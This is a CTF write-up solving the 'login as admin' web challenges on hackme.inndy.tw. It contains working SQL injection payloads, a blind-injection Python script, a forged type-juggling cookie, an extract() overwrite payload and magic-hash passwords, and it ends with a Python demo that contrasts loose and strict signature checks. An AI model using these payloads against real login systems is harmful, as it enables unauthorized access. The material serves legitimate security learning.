hackme.inndy.tw: solutions to the 19 web challenges (part 2)
Contents
- Preface
- ......
- login as admin 0
- Login as Admin 0.1
- login as admin 1.2
- login as admin 3
- login as admin 4
- login as admin 6
- login as admin 7
- To be continued...
Preface
I recently came across a rather interesting CTF OJ; here is the link:
https://hackme.inndy.tw/
It has quite a few web challenges. At the challenge author's request, this article will not give out flags directly, but it will include detailed analysis and attack scripts.
0x08 login as admin 0.1
```sql
admin' union select 1,2,3,4#
```
Column 2 is echoed back, so construct:
```sql
admin' union select 1,database(),3,4#
```
The database name is login_as_admin0, hence:
```sql
admin' union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),3,4#
```
This reveals the table name h1dden_f14g (0x68316464656e5f66313467 below is its hex encoding, which avoids quoting the name).
```sql
admin' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x68316464656e5f66313467 limit 0,1),3,4#
```
This reveals the column name the_f14g.
```sql
admin' union select 1,(select the_f14g from h1dden_f14g limit 0,1),3,4#
```
And we get the flag.
0x09 Login as Admin 1
Note the filter:
```php
function safe_filter($str)
{
    $strl = strtolower($str);
    if (strstr($strl, ' ') || strstr($strl, '1=1') || strstr($strl, "''")
        || strstr($strl, 'union select') || strstr($strl, 'select ')) {
        return '';
    }
    return str_replace("'", "\'", $str);
}
```
There is an additional filter on spaces, which /**/ bypasses. The filters for union select and the like are also very loose (they only match the exact substrings 'union select' and 'select '), so adapting the previous challenge's payload is enough:
```sql
admin'/**/or/**/1/**/limit/**/0,1#
```
That does it.
0x10 login as admin 1.2
This time union select no longer echoes anything, so I went with blind injection. But it was far too slow... I didn't run it to completion... The rough script is below; testing it against the database name worked:
```python
import requests

url = "https://hackme.inndy.tw/login1/index.php"
flag = ""
for i in range(1, 100):
    for j in range(33, 127):
        # boolean-based blind injection: test whether the i-th character of the
        # first schema name has ASCII code j
        payload = "admin'/**/or/**/(ascii(substr((select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1),%s,1))=%s)/**/limit/**/0,1#" % (i, j)
        data = {
            "name": payload,
            "password": "1"
        }
        r = requests.post(url=url, data=data)
        # a true condition selects the admin row, which yields this message
        if "You are not admin!" in r.text:
            flag += chr(j)
            print(flag)
            break
```
0x11 login as admin 3
Key code:
```php
function load_user()
{
    global $secret, $error;
    if(empty($_COOKIE['user'])) {
        return null;
    }
    $unserialized = json_decode(base64_decode($_COOKIE['user']), true);
    $r = hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig'];
    if(hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']) {
        $error = 'Invalid session';
        return false;
    }
    $data = json_decode($unserialized['data'], true);
    return [
        'name' => $data[0],
        'admin' => $data[1]
    ];
}
```
There is a loose comparison here:
```php
hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']
```
Because the cookie goes through json_decode, we control the type of sig. Setting sig=0 (an integer) is enough to bypass the MAC check: PHP converts the hex digest string to a number for the comparison. So construct the cookie as follows:
```php
function set_user()
{
    $user = ['admin', true];
    $data = json_encode($user);
    $sig = 0;
    $all = base64_encode(json_encode(['sig' => $sig, 'data' => $data]));
    echo $all;
}
set_user();
```
Add user=eyJzaWciOjAsImRhdGEiOiJbXCJhZG1pblwiLHRydWVdIn0= to the cookie and refresh the page to get the flag.
0x12 login as admin 4
A logic bug in the code: a username of admin succeeds directly. Just run
```shell
curl -d "name=admin" https://hackme.inndy.tw/login4/
```
to get the flag.
0x13 login as admin 6
The key code:
```php
if(!empty($_POST['data'])) {
    try {
        $data = json_decode($_POST['data'], true);
    } catch (Exception $e) {
        $data = [];
    }
    extract($data);
    if($users[$username] && strcmp($users[$username], $password) == 0) {
        $user = $username;
    }
}
```
Variables can be overwritten via:
```php
extract($data);
```
Since $data comes straight from the request body, extract() lets us define $users ourselves along with the username and password it is checked against. So we construct:
```
data = {"users":{"admin":"sky"},"username":"admin","password":"sky"}
```
which bypasses the check and logs in successfully.
0x14 login as admin 7
An md5 loose comparison that can be satisfied with hashes starting with 0e (md5("QNKCDZO") is 0e830400451993494058024219903391, which PHP treats as the number 0 in a == comparison). Choose:
```
name = admin
password = QNKCDZO
```
and that's it.
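The two type-juggling bugs above (challenge 3's `hash_hmac(...) != $sig` with sig=0, and challenge 7's 0e md5 comparison) both come from PHP's loose `==`. The following Python is an added example, not code from the write-up or from the challenge site: it emulates the PHP 7 comparison rules closely enough to reproduce both bypasses and places the hardened check beside the loose one. The secret is a constructed placeholder (the real one is unknown); the cookie is the one from the write-up.

```python
import base64
import hashlib
import hmac
import json
import re

# PHP 7 numeric-string grammar (whitespace, sign, digits, fraction, exponent).
# fullmatch() = "numeric string"; match() = the "leading numeric" prefix.
_NUM = re.compile(r"\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")

def php_to_number(s):
    """Leading numeric prefix of s as PHP 7 sees it, or 0 if there is none."""
    m = _NUM.match(s)
    return float(m.group(0)) if m else 0.0

def php_loose_eq(a, b):
    """PHP 7 '==' for the str/int cases these two challenges rely on. PHP 8 compares
    int vs non-numeric string as strings, but numeric-string pairs still numerically."""
    if isinstance(a, str) and isinstance(b, str):
        if _NUM.fullmatch(a) and _NUM.fullmatch(b):
            return float(a) == float(b)      # "0e123..." == "0e456..." -> True
        return a == b
    if isinstance(a, str):                   # normalise to (int, str)
        a, b = b, a
    return a == (php_to_number(b) if isinstance(b, str) else b)

def expected_sig(data, secret):
    return hmac.new(secret, data.encode(), hashlib.sha512).hexdigest()

def loose_verify(data, sig, secret):
    """Challenge 3's check as written: hash_hmac(...) != $sig with loose '!='.
    With sig = 0 (an int from JSON) it passes whenever the hex HMAC's leading
    numeric prefix is 0, e.g. it starts with a letter or with "0e<digits>"."""
    return php_loose_eq(expected_sig(data, secret), sig)

def strict_verify(data, sig, secret):
    """Hardened check: reject a non-string sig, then compare in constant time
    (PHP equivalent: is_string($sig) && hash_equals($expected, $sig))."""
    if not isinstance(sig, str):
        return False
    return hmac.compare_digest(expected_sig(data, secret), sig)

def magic_md5_collide(a, b):
    """Challenge 7: two inputs whose md5 hex digests both look like 0e<digits>
    are '==' in PHP, because both parse as the float 0."""
    return php_loose_eq(hashlib.md5(a).hexdigest(), hashlib.md5(b).hexdigest())
# The forged cookie from the write-up; it decodes to {"sig":0,"data":"[\"admin\",true]"}.
FORGED = json.loads(base64.b64decode("eyJzaWciOjAsImRhdGEiOiJbXCJhZG1pblwiLHRydWVdIn0="))
SECRET = b"constructed-demo-secret"          # constructed; the real secret is unknown
```

Call `loose_verify(FORGED["data"], FORGED["sig"], SECRET)` and `strict_verify(...)` with the same arguments to see the two checks disagree on the forged cookie; `magic_md5_collide(b"QNKCDZO", b"240610708")` shows the challenge 7 case.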